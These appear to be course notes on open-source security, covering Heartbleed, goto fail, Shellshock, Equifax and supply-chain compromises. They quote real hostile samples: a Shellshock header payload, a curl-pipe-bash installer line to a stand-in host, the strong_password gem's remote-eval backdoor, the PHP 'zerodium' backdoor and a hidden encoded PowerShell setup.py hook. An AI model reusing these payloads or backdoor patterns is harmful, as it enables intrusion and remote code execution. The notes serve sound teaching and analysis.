Open-Source Security
    Is open source more secure because more people look at the code? Or less
      secure, because bad guys can look at the code and find bugs?
    This question has been debated for quite some time. For a while,
      so-called "fuzzing" techniques (for generating random input) did work
      better when the source was available: the user would examine the source
      and generate input until all the edge cases were triggered. The goal was
      to execute every part of the code.
    But then that changed: tools were developed that could do this given only
      the object code. At that point, having the source was no longer a
      liability. A large number of Windows exploits started to appear.
    On the other hand, the truth is that not everybody looks at the
      code. In most cases, not very many do.
    TLS, for Transport Layer Security, is an encryption layer used above TCP
      (or UDP). It is what creates the 's' in https, for secure
      http.
    Three issues
    First, the software can have bugs. Perhaps this is more likely for Open
      Source because of fewer development resources, though that is hard to say.
    
    Second, repositories can be compromised. This, too, can happen with
      commercial software, but Open Source does seem to be at least a little
      more prone to this.
    Finally, it is easy for users to fall behind on upgrading. If you're
      installing an e-commerce package from Microsoft, then Microsoft will make
      sure it gets updated. However, if you're building your own e-commerce
      package from a dozen separate open-source projects, then it's your job to
      update them all. It's easy to forget.
    These issues completely ignore the question of how many users actually
      look at the code in their open-source packages, or whether it's easier to
      figure out vulns once you hear vaguely of a problem with a certain
      project. 
    It remains true that Open Source projects are easier to trust. Even
      software from Microsoft is often tracking you or selling you something.
    Debian OpenSSL bug
    At some point (probably 2006), Debian removed a couple lines from the
      Debian copy of OpenSSL because the lines generated complaints from
      code-analysis software. Here's the code as of today, from boinc.berkeley.edu/android-boinc/libssl/crypto/rand/md_rand.c;
      the function is static void ssleay_rand_add(const
        void *buf, int num, double add). The variable m is a pointer to a
      certain structure. The call to MD_Update() itself is actually a macro:
    #define MD_Update(a,b,c)	EVP_DigestUpdate(a,b,c)
    
    The variable m is a pointer to a certain structure. Here is part of the
      code:
    	for (i=0; i<num; i+=MD_DIGEST_LENGTH)
		{
		j=(num-i);
		j=(j > MD_DIGEST_LENGTH)?MD_DIGEST_LENGTH:j;
		MD_Init(&m);
		MD_Update(&m,local_md,MD_DIGEST_LENGTH);
		k=(st_idx+j)-STATE_SIZE;
		if (k > 0)
			{
			MD_Update(&m,&(state[st_idx]),j-k);
			MD_Update(&m,&(state[0]),k);
			}
		else
			MD_Update(&m,&(state[st_idx]),j);
		/* DO NOT REMOVE THE FOLLOWING CALL TO MD_Update()! */
		MD_Update(&m,buf,j);
		/* We know that line may cause programs such as
		   purify and valgrind to complain about use of
		   uninitialized data.  The problem is not, it's
		   with the caller.  Removing that line will make
		   sure you get really bad randomness and thereby
		   other problems such as very insecure keys. */
		MD_Update(&m,(unsigned char *)&(md_c[0]),sizeof(md_c));
		MD_Final(&m,local_md);
		md_c[1]++;
		buf=(const char *)buf + j;
		for (k=0; k<j; k++)
			{
			/* Parallel threads may interfere with this,
			 * but always each byte of the new state is
			 * the XOR of some previous value of its
			 * and local_md (itermediate values may be lost).
			 * Alway using locking could hurt performance more
			 * than necessary given that conflicts occur only
			 * when the total seeding is longer than the random
			 * state. */
			state[st_idx++]^=local_md[k];
			if (st_idx >= STATE_SIZE)
				st_idx=0;
			}
		}
 
    
    The code-analysis software thought the repeated calls (this is inside a
      loop) to MD_Update(&m,buf,j) made use of uninitialized data.
      This may actually have been the case, in that perhaps some
      entropy was indeed supposed to come from the uninitialized data. The code
      does look odd, though, from a deterministic point of view.
      Still, the point of the repeated calls to MD_Update() was to generate
      additional randomness. 
    Commenting out the call to MD_Update(&m,buf,j) greatly reduced the
      total available entropy. Supposedly the entropy now came from a single
      16-bit number. This really breaks the random-number
      generator.
    Debian discovered and fixed the error in 2008.
    Apple TLS bug
    Here is the source code (Apple has open-sourced a lot of OS X, but not
      the GUI parts of it):
    static OSStatus
SSLVerifySignedServerKeyExchange(SSLContext *ctx, bool isRsa, SSLBuffer signedParams,
                                 uint8_t *signature, UInt16 signatureLen)
{
	OSStatus        err;
	...
	if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0)
		goto fail;
	if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
		goto fail;
		goto fail;
	if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
		goto fail;
	...
	err = sslRawVerify();
	...
fail:
	SSLFreeBuffer(&signedHashes);
	SSLFreeBuffer(&hashCtx);
	return err;
}
    
    Note the duplicated "goto fail".
      Note the lack of enclosing {}. Despite the appearances of the indentation,
      the second goto fail is thus
      always executed. The call to SSLVerifySignedServerKeyExchange()
      always jumps to fail. But most likely we still have err==0 at this point
      (because none of the err != 0 checks actually succeeded), and so the
      connection is verified even if there was a certificate mismatch.
    It's times like this that it is really handy to have the
      compiler doing dead-code detection. Fail.
    Ok, nobody was looking at the Apple source here outside of Apple.
    OpenTLS bug
    As the Debian and Apple issues above show, anyone can introduce TLS bugs.
      But the "heartbleed" bug was clearly related to the relatively modest
      development resources available to the OpenSSL foundation.
    Most servers used OpenSSL, officially OpenTLS. TLS contains a heartbeat
      provision: the client sends occasional "heartbeat request" packets and the
      server is supposed to echo them back, exactly as is. This keeps the
      connection from timing out. That is, the client sends a (len,data)
      pair, and the server is supposed to echo back that much data. Part of the
      reason for echoing back data is so the client can figure out which request
      triggered a given response. It might make the most sense for the client
      request data to represent consecutive integers: "0", "1", ..., "10", "11",
      "12", ....
    The problem is that the client can lie: the client can send a request in
      which len ≠ data.length. If
      len < data.length,
      this is harmless; just the first len
      bytes of data get sent back.
      But what happens if len >
        data.length, and the server sends back len
      bytes? In this case the server would try to send too much back. In a
      sensible language, this would result in an array-bounds exception for
      data. In C, however, the result is the grabbing of a random chunk of
      memory beyond data. Suppose
      a sneaky client sent, say, a 3-byte payload, but declared the
      payload length (the value of len)
      as, say, 1000 bytes. The server now sends back 997 bytes of general heap
      memory, which may contain interesting content. Unpredictable, but
      interesting.
    
    
    
    Here is the original code, from tls1_process_heartbeat(SSL * s). The
      variable payload represents
      the length of the heartbeat payload.
    n2s(p, payload);	// extract value of payload (the length)
pl = p;
...
if (hbtype == TLS1_HB_REQUEST) 
	{
	unsigned char *buffer, *bp;
	int r;
	/* Allocate memory for the response, size is 1 bytes
	 * message type, plus 2 bytes payload length, plus
	 * payload, plus padding
	 */
	buffer = OPENSSL_malloc(1 + 2 + payload + padding);
	bp = buffer;
	/* Enter response type, length and copy payload */
	*bp++ = TLS1_HB_RESPONSE;
	s2n(payload, bp);
	memcpy(bp, pl, payload);    // pld: copy payload bytes from pointer pl to pointer bp (=buffer, above)
	bp += payload;
	/* Random padding */
	RAND_pseudo_bytes(bp, padding);
	r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding);
	if (r >= 0 && s->msg_callback)		// pld: this will get moved
	      s->msg_callback(1, s->version, TLS1_RT_HEARTBEAT,
	            buffer, 3 + payload + padding,
	            s, s->msg_callback_arg);
	OPENSSL_free(buffer);
	if (r < 0)
	      return r;
	}
    There is no check here that the value of payload, the declared
      length of the payload, matches the actual length of the payload.
      
      
    Here is the fix:
    if (hbtype == TLS1_HB_REQUEST) 
	{
	unsigned char *buffer, *bp;
	int r;
	/* Allocate memory for the response, size is 1 bytes
	 * message type, plus 2 bytes payload length, plus
	 * payload, plus padding
	 */
	buffer = OPENSSL_malloc(1 + 2 + payload + padding);
	bp = buffer;
	/* Enter response type, length and copy payload */
	*bp++ = TLS1_HB_RESPONSE;
	s2n(payload, bp);
	if (r >= 0 && s->msg_callback)		// this got moved, so it always executes even if one of the returns below is made
	      s->msg_callback(1, s->version, TLS1_RT_HEARTBEAT,
	            buffer, 3 + payload + padding,
	            s, s->msg_callback_arg);
	if (1+2+16 > s->s3->rrec.length)	// check if actual payload length > 0!
	      return 0;
	memcpy(bp, pl, payload);    // copy payload bytes from pointer pl to pointer bp (=buffer, above)
	if (1+2+payload+16 > s->s3->rrec.length)	// check if actual payload length is longer than declared length
	      return 0;					// RFC 6520 section 4 says to silently discard
	bp += payload;
	/* Random padding */
	RAND_pseudo_bytes(bp, padding);
	r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding);
	OPENSSL_free(buffer);
	if (r < 0)
	      return r;
	}
    
    Google reported the bug to the OpenSSL Foundation on April 1, 2014. It is
      estimated that somewhere between 15 and 60% of sites using SSL were
      affected. 
    The bug is now fixed. Nobody knows how much it was exploited.
    The more interesting question might be why OpenSSL didn't get more
      attention before. There were people outside the OpenTLS
      Foundation looking at the code, but none of them noticed Heartbleed. 
    Ultimately, the problem was that OpenTLS was severely underfunded. The
      president of the OpenSSL foundation is (or was, in 2014; he's since left)
      Steve Marquess. In a blog
        post after Heartbleed, he described himself as the fundraiser. The
      OpenSSL foundation received $2,000/year in donations, and also did some
      support consulting (the latter earned a lot more).
    In the week after Heartbleed, the OpenSSL foundation received $9,000,
      mostly in small donations from individuals. Not from the big corporate
      users of OpenSSL.
    The foundation has one paid employee, Stephen Henson, who has a PhD in
      graph theory. He is not paid a lot. Before Steve M created the OpenSSL
      foundation, Steve H's income has been estimated at $20K/year. (The
      heartbleed error was not his.)
    Despite the low level of funding, though, in the eight (or more) years
      before Heartbleed the OpenSSL Foundation was actively seeking
      certification under the NIST Cryptographic
        Module Validation Program. They understood completely that
      cryptography needs outsider audits.
    As of 2014, at least, the two Steves had never met face-to-face. Like
      Steve M, Steve Henson moved on to other projects in 2017.
    A month after the bug's announcement, the Linux Foundation announced that
      it was setting up the Core
        Infrastructure Initiative. They lined up backing from Google, IBM,
      Facebook, Intel, Amazon and Microsoft. The first project on the agenda was
      OpenSSL, and its struggle to gain certification from the US government.
    In 2015 a formal audit of OpenSSL was funded, by the Open Crypto Audit
      Project, opencryptoaudit.org.
      That audit has now been completed; a 2016 status report is at icmconference.org/wp-content/uploads/G12b-White.pdf.
    Here is a report of a later audit: ostif.org/the-ostif-and-quarkslab-audit-of-openssl-is-complete.
    As of 2016, Black Duck reported that 10% of the applications they tested
      were still vulnerable to Heartbleed, 1.5 years after the revelation (info.blackducksoftware.com/rs/872-OLS-526/images/OSSAReportFINAL.pdf).
      
    See also the Buzzfeed article "The
        internet is being protected by two guys named Steve".
    
    
    More Open-Source Security Issues
    Magento
    Magento is an e-commerce platform
      owned by Adobe. It is described as having an "open-source ecosystem". It is
      available on github at github.com/magento.
      I assume that is the "community edition"; there is also an "enterprise
      edition".
    A vulnerability was announced in April 2017 by DefenseCode LLC, six
      months after it was reported privately to Magento. Magento did not respond
      directly to DefenseCode. The vulnerability "could" lead to remote code
      execution, though there are some additional steps to get that to work, and
      it was not clear whether that actually happened in the wild. See www.defensecode.com/advisories/DC-2017-04-003_Magento_Arbitrary_File_Upload.pdf.
    
    If a site adds a link to a product video stored remotely on Vimeo, the
      software automatically requests a preview image. If the file requested is
      not in fact an image file, Magento will log a warning message, but it will
      still download the file. The idea is to trick Magento into downloading an
      executable file, eg a .php file. An updated .htaccess
      file also needs to be downloaded, but once the basic file-download idea is
      working this is not difficult. Because of the way files are stored, the
      .php file should begin with ".h", so the .htaccess file ends up in the
      same directory.
    Parts of the strategy also involve cross-site request forgeries (CSRF)
      against someone with Magento management privileges at the target site.
      Even low-level privileges are sufficient. There are numerous strategies
      for trying to get someone to click on a suitable link; none of them are
      sure bets.
    Magento's failure to respond more aggressively to DefenseCode was
      puzzling. This seems less likely in a "true" open-source project.
    As of 2018, Magento was still running into security issues, often related
      to brute-force attacks on administrative passwords, which were often not
      well-configured. Magento is an attractive target, as it is an e-commerce
      front-end, and as a result a large number of credit-card transactions flow
      through it.
    Also in 2018, open-source security firm Black Duck sold for half a
      billion. 
    Equifax 
    In August 2017 credit-reporting company Equifax discovered that personal
      records on 140 million US people had been exfiltrated. The actual
      vulnerability was in Apache Struts 2, which is  a
      framework for developing Java server-side web applications. It extends the
      Java Servlet API. Struts has a history of serious vulnerabilities. The
      vulnerability in question was CVE-2017-5638,
      which allows for remote code execution.
    Equifax was notified of the issue in March 2017. They looked, but could
      not find a place on their site where Struts was being used! The
      vulnerability went unpatched, even as it was being routinely exploited in
      the wild.
    Making sure tools and frameworks are updated is tedious work. Something
      like Struts can be buried in the archives of a project that was largely
      completed years ago. Ultimately, the attackers found a flaw in a very old
      package known as the Automated Consumer Interview System.
    In 2020, the FBI announced charges against four Chinese nationals who
      they believe developed the attack.
    A more detailed analysis is at blog.0x7d0.dev/history/how-equifax-was-breached-in-2017.
      That report attributes the breach to these factors:
    
      
        - Insufficient knowledge of their legacy systems.
 
        - Poor password storage practices.
 
        - Lack of rigor in the patching process.
 
        - Lack of network segmentation.
 
        - Lack of Host-Based Intrusion Detection System (HIDS)
 
        - Lack of alerting when security tools fail.
 
      
      Equifax was negligent, in that they missed some things, but it is hard
        to say they were glaringly negligent.
      The Chinese probably use the information to identify people who are
        under significant financial stress, and who may be vulnerable to
        bribery.
     
    
    Shellshock
    This is the bug that was in bash that allowed very easy remote code
      execution. It was discovered and fixed in 2014. The problem is that the
      act of setting an environment variable -- normally benign -- could be
      tricked so as to execute a shell script as well, if the environment
      variable began with a shell function definition. 
    The shell maintains the environment as a list of (name,value)
      pairs. Specifically, we can assign an environment variable as follows:
    FOO=here_is_my_string
    echo $FOO
    We can also assign shell functions, eg with
    FN() { echo hello;}
    (the space before "echo" is significant). Prior to Shellshock, this would
      be stored in the environment as the pair (FN, "() { echo hello;}").(You
      can list bash functions with typeset
        -F, and see the entire environment with env.)
    The problem was that one could sneak a command following the
      function definition, and it would be executed at the time the
        environment variable was set:
    FN() { echo hello;}; echo
        "hello world!"
    (The command, in red here, is not actually part of the function.) This is
      due to a mistake in recognizing the end of the function
      body. The above looks to older versions of bash like the following
      environment-variable assignment, followed by a command.
    FN='{ echo hello;}; echo "hello world!"'
    Whenever this definition is executed (eg at the time
      it is made, and whenever the environment is passed to a new process), the
      'echo "hello world!"' command would go along for the ride. The core
      problem here occurs with shell variables that begin with '()'; normal
      shell-variable strings do not result in command execution. That is,
      assigning a variable FN2='echo "hello world"' would not
      result in executing the command; nor would FN3="foo"; echo "hello world"
      (though when done for the first time the FN3 example would echo
      "hello world" once).
    This is most of the problem. The other part is that web servers, and
      quite a range of other software, routinely accept strings from clients
      that they then turn into environment variables. For example, if the client
      sends the following GET request to the server (from blog.cloudflare.com/inside-shellshock):
    GET / HTTP/1.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,fr;q=0.6
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Host: cloudflare.com
    
    then the server turns it into the following environment
      settings (before executing the GET request):
    HTTP_ACCEPT_ENCODING=gzip,deflate,sdch
HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.8,fr;q=0.6
HTTP_CACHE_CONTROL=no-cache
HTTP_PRAGMA=no-cache
HTTP_USER_AGENT=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
HTTP_HOST=cloudflare.com
    
    The server does this so that a cgi script on the server will have access
      to these values, through its environment. However, because of the bug,
      setting environment variables can lead to code execution!
    Now, if the client instead sent the following text as User-Agent (there
      is no actual "string" here, in fact):
    User-Agent: () { :; }; /bin/eject
    
    Then the command /bin/eject
      would be executed on the server. (As for the shell function, ":" is the
      bash null command; the legal function part is
          () { :; };.
    
    A consequence of the patch is that bash functions are no longer stored in
      the environment at all. (This wouldn't strictly have been necessary, but
      it probably was a good idea.)
    Meltdown and Spectre
    The Meltdown and Spectre vulnerabilities affect Intel CPUs; Intel
      open-sources nothing about its processors. But open-source operating
      systems still had to create patches.
    The problem is that open-source patches had to be created while there was
      still a news embargo on the details of the vulnerability, lest miscreants
      get a leg up on exploiting them.
    Meltdown and Spectre were discovered in the summer of 2017 by Jann Horn
      of Google, Werner Haas and Thomas Prescher from Cyberus Technology, and
      Daniel Gruss, Moritz Lipp, Stefan Mangard and Michael Schwarz from Cyberus
      Technology. The discoverers informed Intel, and all agreed to announce the
      flaw only once there was a fix in place.
    In November 2017, Alex Ionescu noticed an upgrade to Windows 10 that made
      the CPU run slower, with no obvious benefit. He suspected this was a
      vulnerability patch.
    On Wednesday January 3, there were new commits to the Linux kernel.
      Observers quickly noticed that the commits didn't seem to make sense, from
      a performance perspective. Rampant speculation that they were related to a
      hardware vulnerability led to the announcement of Spectre and Meltdown on
      that date. The scheduled release/announcement date was to be January 9,
      Microsoft's "Patch Tuesday".
    Still, the Linux community by and large did abide by the embargo rules.
      This is complicated, because it means not using the public
      discussion system that has been put in place. It also means not
        releasing important security fixes until the embargo is ended.
    The head of OpenBSD, Theo de Raadt was extremely vexed, as OpenBSD was not
      given advanced warning: 
    Only Tier-1 companies received advance
      information, and that is not responsible disclosure – it is selective
      disclosure.... Everyone below Tier-1 has just gotten screwed.
    De Raadt also argued that, while Spectre might be considered an
      unforeseen bug, the issues behind Meltdown were long understood to at
      least some degree. Intel decided to go ahead with their
      speculative-execution design anyway, in order to beat the competition.
    OpenBSD did announce a fix before the end of the embargo for the Wi-Fi
      Krack vulnerability of October 2017. The theory at that time was that
      OpenBSD would therefore not be given advance warning of the next
      vulnerability. But several other smaller OS vendors (Joyent, SmartOS) also
      were not told about Meltdown/Spectre in advance.
    Still, there is a real problem: to abide by embargo rules means
        sitting on a fix, knowing your users might be being attacked. It
      means your source is, until the embargo ends, no longer "open".
    
    
    Windows Security
    Windows systems are quite hard to secure, partly because there are so
      many files that are not well-understood within the security community, and
      partly because of the registry.
    Licensing rules don't help. If you want to verify the SHA-3 checksum of
      every file, for example, you pretty much have to boot off a clean
      bootfile. Otherwise, malware that has made it into the kernel can make it
      seem that all files are unchanged. However, in Windows, a separate boot
      device technically requires a separate license. And in practice making a
      bootable Windows USB drive is not easy, without paying for a separate
      license.
    Cryptography Software
    It is certainly reasonable to think of commercial software as reliable.
      After all, one can read the reviews, and a company couldn't stay in
      business if it didn't keep its users happy. If the software doesn't work
      properly, won't users know?
    If the software is a word processor, and it keeps crashing, or failing to
      format text properly, the failure is obvious. If the software does complex
      engineering calculations, that's harder to detect, but usually users do at
      least a little testing of their own.
    But if closed-source software does encryption, it is almost
      impossible to verify that it was done correctly. Just what random-number
      algorithm was used? Was the AES encryption done properly? (If it was not,
      then the problem becomes very clear if the software is sending
      encrypted content to an independent decryption program, but this is often
      not the case. Lots of times, the same program is used to encrypt files and
      then later to decrypt them, in which case an algorithm with a security
      flaw is almost undetectable.) Was the encryption done first, followed by
      the authentication hash (HMAC), or was it the other way around? Doing it
      the first way is much safer, as the HMAC then provides no information
      about whether brute-force decryption is on the right track.
    For reasons like this, some commercial encryption software is audited.
      But usually it is not. The bottom line is that commercial crypto is hard
      to trust.
    Sometimes open-source isn't audited either. But it's hard to find out.
      And even with OpenSSL, people outside the OpenSSL foundation were looking
      at the basics of encryption, to make sure it looked ok.
    Software Trust
    Whatever one can say about open-source reliability (which, in general, is
      comparable to commercial-software reliability), open source wins the trust
      issue hands down. Once upon a time, most software was trustworthy, in that
      you could be reasonably sure the software was not spying on you. Those
      days are gone. Most Android apps spy, to some degree or another, on the
      user. Microsoft Office appears not to, but Windows 10 sends quite a bit of
      information back to Microsoft (some of this can be disabled through
      careful configuration). 
    Spyware is almost unknown, however, in the open-source world. Ubuntu has
      a search feature, that returns some information to Canonical, but that's
      reasonably up-front. Firefox often asks to send crash reports, but, again,
      that's open. The reasons open-source spyware is so rare are:
    
      - users intensely dislike it
 
      - it is usually easy to find in the source code attempts to
        create new network connections that exfiltrate data back to the
        mothership
 
    
    Ironically, "free" software that is not open-source is usually
      spyware: "if you're not paying for the product, you are the
      product". Most non-open-source browser add-ons, in particular, are
      spyware. Many Android apps are spyware; flashlight apps are notorious. 
    Open-source trust is not always quite straightforward. Firefox, for
      example, is the browser with the most privacy-protection features, hands
      down. A version of Firefox is the basis for the Tor browser. That said,
      many Firefox privacy features are disabled by default, because some
      commercial sources of Firefox funding have had concerns.
     
    SourceForge (and Gimp)
    SourceForge is a popular alternative to GitHub for open-source projects.
      GitHub makes money selling space for non-public projects (public projects
      are free). SourceForge sold banner advertisements, and in 2013 started a
      "bundleware" program in which a user who downloaded a program or source
      tree would optionally receive a second download. The second download was
      selected by default, though users could unselect it. SourceForge is often
      used to distribute binaries, so this bundleware issue was not
      easily avoided once the download started.
    The problem was that the second downloaded package, a paid installation,
      often involved malware. At a minimum, spyware was common. Another common
      feature was advertisements that were allowed to contain a large DOWNLOAD
      button.
    The Gimp project left SourceForge in 2013, but as of 2015 SourceForge was
      still distributing Gimp binaries (as an "abandoned" project), and bundling
      them with malware. This did not go over well with the Gimp team.
    How can an open-source project protect itself against malicious
      distribution? What happens when a project is completely abandoned? What
      happens when a project simply moves elsewhere?
    In 2016 the bundleware program was ended, as new owners took control.
    Generally speaking, the actual open-source repositories weren't usually
      tampered with, though the Gimp case might be an exception.
    Tampered or Trojaned Repositories
    These are also sometimes called software "supply chain" attacks.
    In 2003, the main Linux repository was still on BitKeeper, but they
      maintained separate mirror repository running CVS. One day a patch
      appeared in the CVS image in the code for the wait4()
      call:
    +       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+                       retval = -EINVAL;
     
    That last '=' on the first line is an assignment, not a comparison.
      Setting uid to 0 gives the process root privileges. Inside a syscall, that
      is legal.
    This patch never made it back to the main BitKeeper repo, and it was
      pretty obvious from the beginning as it was the only file on the CVS
      mirror that didn't have a link back to BitKeeper, but nobody knows how it
      got there. See lwn.net/Articles/57135.
    There was a break-in at kernel.org in 2011. It is not certain that no
      kernel files were briefly modified, though the rigorous checksumming
      process would have made that difficult.. Donald Austin was arrested for
      the breach, in Florida, in 2016. 
    In 2012, a SourceForge mirror site was hacked, and the phpMyAdmin package
      was modified to contain malware.
    In June 2018, hackers took over a Gentoo mirror account on github and
      installed file-deleting malware. Gentoo suffered at least one earlier such
      attack, in 2010.
    In July 2018, three packages on the Arch User Repository were infected
      with malware, including acroread (Adobe Acrobat Reader). Acroread isn't
      open-source, but it's trivial to install a one-line attack in the
      installation script:    
       curl -s https://badware.ly/stuff.sh | bash &
    The AUR is not the same as the Arch distribution itself, but
      distinctions like this are sometimes hard to keep track of.
    In an Aug 7, 2018 blog post, Eric Holmes describes how he gained commit
      access to Homebrew using credentials he found on the site. See medium.com/@vesirin/how-i-gained-commit-access-to-homebrew-in-30-minutes-2ae314df03ab.
      Homebrew is a package manager for macs, though it also works well under
      Linux.
    I'm harvesting credit card numbers and passwords from your site. Here's
      how.
    This was a 2018 warning post by David Gilbertson (david-gilbertson.medium.com/im-harvesting-credit-card-numbers-and-passwords-from-your-site-here-s-how-9a8cb347c5b5),
      who was not actually doing this, but wanted to point out how
      easy it was. Gilbertson discusses several standard countermeasures, and
      describes how they are close to useless.
     
    Webmin
    There was also a 2018 attack to Webmin,
      a system-administration tool, in which password_change.cgi was modified.
      See www.webmin.com/exploit.html
      for details. The attack affected the code on the build server, but
      apparently not the Github repository. Still, the vulnerable code
      was widely distributed. Most users, for example, installed the Debian or
      RPM pre-compiled package.
    
    Ruby strong_password gem
    In June 2019 the Ruby strong_password
      gem (Ruby's name for library), version 0.0.7, was hijacked. 
    See withatwist.dev/strong-password-rubygem-hijacked.html
    Here's the crucial code:
    Thread.new {
    loop {
      _!{
        sleep rand * 3333;
        eval(
          Net::HTTP.get(
            URI('https://pastebin.com/raw/xa456PFt')
          )
        )
      }
    }
  } if Rails.env[0] == "p"
    
     
    This:
    
      - starts a new thread
 
      - after sleeping 3333 seconds (an hour is 3600 seconds)
 
      - retrieves code from pastebin.com
 
      - executes it
 
      - wrapped in an empty exception handler, so you won't see errors (pld:
        I'm not sure about this, but maybe _!
        does this)
 
      - only if Ruby is running in production mode (making
        it harder to observe via testing)
 
    
    This happened in March 2019 with a different Ruby package: zdnet.com/article/backdoor-code-found-in-popular-bootstrap-sass-ruby-library.
    In both cases, the github.com source was unchanged; the distribution at
      rubygems.org was what was compromised.
    There were multiple related vulnerabilities discovered in August 2019: github.com/rubygems/rubygems.org/wiki/Gems-yanked-and-accounts-locked#19-aug-2019
    There's also the VestaCP admin interface, and a python package Colourama.
    
    Consider building from source for production versions!
    Decompress
    A vulnerability in the open-source file-compression utility decompress
      was discovered in 2020. The problem is that, while decompressing, it could
      overwrite files such as ../../../etc/passwd (or, for that matter,
      ./foo/bar/../../../../../etc/passwd). This is a very old idea, but it
      keeps coming up. It is surprisingly hard to validate legitimate relative
      paths.
    PyYAML
    YAML is a data-serialization format, not unlike JSON. PyYAML unpacks YAML
      data. Alas, it could be tricked, in a bug discovered in 2020, into running
      arbitrary constructors (and thus arbitrary code) when deserializing data.
      (The pickle library, the standard Python serialization mechanism, had the
      same issue a few years earlier.)
    Lodash
    This is a javascript library that supports a range of common utility
      functions. It is used in over ~4 million projects on Github alone. A vuln
      discovered in 2019 involved "prototype pollution", eg
      modification of Object-level standard methods through introduction of new
      child classes.
    Octopus
    The Octopus scanner was malware on Github that tried to infect other
      repositories, through the use of a Netbeans issue. It was discovered in
      Spring 2020. Once a Netbeans installation was infected, every .jar file
      built with that installation would also carry the infection. See securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain.
    Zerodium
    In March 2021 it was discovered that an update to PHP contained a
      backdoor. If a website used the compromised PHP, someone could execute
      arbitrary code through the use of the password "zerodium". The PHP code
      was on a private git server git.php.net. It looks like the server itself
      was compromised; the malicious code appeared to have been uploaded by two
      trusted PHP maintainers (who were not in fact involved).
    There is in fact a security company named Zerodium, but they were not
      related.
    The added code looked something like this (bleepingcomputer.com/news/security/phps-git-server-hacked-to-add-backdoors-to-php-source-code):
    convert_to_string(enc);
        if (strstr(Z_STRVAL_P(enc), "zerodium")) {
            zend_try {
                zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS:
        sold to zerodium, mid 2017");
      
    The idea was that if your User-Agent HTTP header string began with
      "zerodium", then the rest of the string would be executed. That
      "REMOVETHIS" string is just what gets inserted in the logfiles.
    The Great Suspender
    This was a tool to suspend inactive browser tabs, to conserve resources.
      It had two million users. The entire project was sold in 2020, and in 2021
      Google flagged it as containing malware. 
    Other package maintainers have been offered significant sums to sell
      their software. 
    npm colors and faker
      libraries
    Npm (Node.js Package Manager) is a large open repository for javascript
      tools. The colors and faker libraries were legit tools that appeared to
      have been corrupted by a malicious attacker in January 2022.
    Alas, the real situation turned out to be somewhat more complicated:
      package developer Marak Squires was simply really mad at big
      corporations using his packages without contributing any support. From www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps:
    
      The reason behind this mischief on the
        developer's part appears to be retaliation—against
        mega-corporations and commercial consumers of open-source projects
        who extensively rely on cost-free and community-powered software but do
        not, according to the developer, give back to the community.
       
      In November 2020, Marak had warned that he
        will no longer be supporting the big corporations with his "free work"
        and that commercial entities should consider either forking the projects
        or compensating the dev with a yearly "six figure" salary.
     
    
    This is a complicated development. Most open-source maintainers, while
      sympathetic, ultimately decided this was a terrible idea.
    PyPi
    This is the Python Package Index. Everybody uses it.
    FastAPI is a Python framework with a long history. In March 2022,
      legitimate package fastapi-toolkit
      was added. In November 2022, a commit with a malicious backdoor was
      accepted. It was detected. When incorporated into a web project, the
      backdoor allows an external attacker to run arbitrary Python, and make
      arbitrary SQL queries (including writes) using a specially crafted HTTP
      header. See securitylabs.datadoghq.com/articles/malicious-pypi-package-fastapi-toolkit.
    In February 2023, the Phylum team
      discovered over two thousand new packages that, while not necessarily
      malicious themselves, all contained the following code in the setup.py
      file:
    if not
        os.path.exists('tahg'):    # basically never
        exists   
            subprocess.Popen('powershell
          -WindowStyle Hidden -EncodedCommand
          cABvAHcAZQByAHMAaABlAGwAbAAgAEkAbgB...AGMAaABlAC4AZQB4AGUAIgA=', 
                   
            shell=False, creationflags=subprocess.CREATE_NO_WINDOW)
          except: pass
        
    So
          to install this package is to run that mysterious base64-encoded
          executable. See blog.phylum.io/phylum-discovers-another-attack-on-pypi.
    100,000
          infected Github repositories
    Beginning
          in late 2023, a malware group started a large-scale project to
    
      fork
            popular Github repositories 
      - infect them with malware
 
      - put them back on Github with a very
          similar name
 
    
    No one is quite sure how many malicious repos there are, but 100,000 or
      so have been identified. Identification is based on the
      automated clone process; manual malicious clones are not detected. The
      project name itself is the original one (eg numpy). 
    Many of the malicious github clones are based on the PyPi packages above.
    See apiiro.com/blog/malicious-code-campaign-github-repo-confusion-attack.
      There is an animated gif there, showing an exec() of a malicious string
      tabbed over way to the right.
    PyTorch
    Here's a discussion of how a White Hat team figured out how to attach
      malicious software to PyTorch, the machine-learning front end.
     Our exploit path resulted in the ability to
      upload malicious PyTorch releases to GitHub, upload releases to AWS,
      potentially add code to the main repository branch, backdoor PyTorch
      dependencies – the list goes on. In short, it was bad. Quite bad.
    Github allows code to be executed as part of pull requests; this feature
      is called Github Actions. This makes great sense for testing, but running
      untrusted code is a problem.
    
    johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch.
      
        
     
    Google Search can be dangerous
    Brian Krebs has written about how hard it can be to find well-known free
      software packages using Google. The bad guys have not only created similar
      websites, but in some cases they have used legitimate Google programs to
      pay to elevate their sites in the search rankings. See https://krebsonsecurity.com/2024/01/using-google-search-to-find-software-can-be-risky.
    The situation is just as bad with open-source packages intended for
      developers. See www.csoonline.com/article/654560/why-open-source-software-supply-chain-attacks-have-tripled-in-a-year.html
      and www.fortinet.com/blog/threat-research/supply-chain-attack-via-new-malicious-python-packages.
    
    2024 xz vulnerability
    A serious supply-chain attack on ssh was published on March 29, 2024, by
      Andres Freund, who discovered it by noting an unexpected increase in the
      cpu usage of ssh. 
    Ssh, or Secure SHell, is the standard encrypting way
      of logging into remote machines. Like most encryption software, it
      compresses its data first, to reduce the feasibility of "known-plaintext"
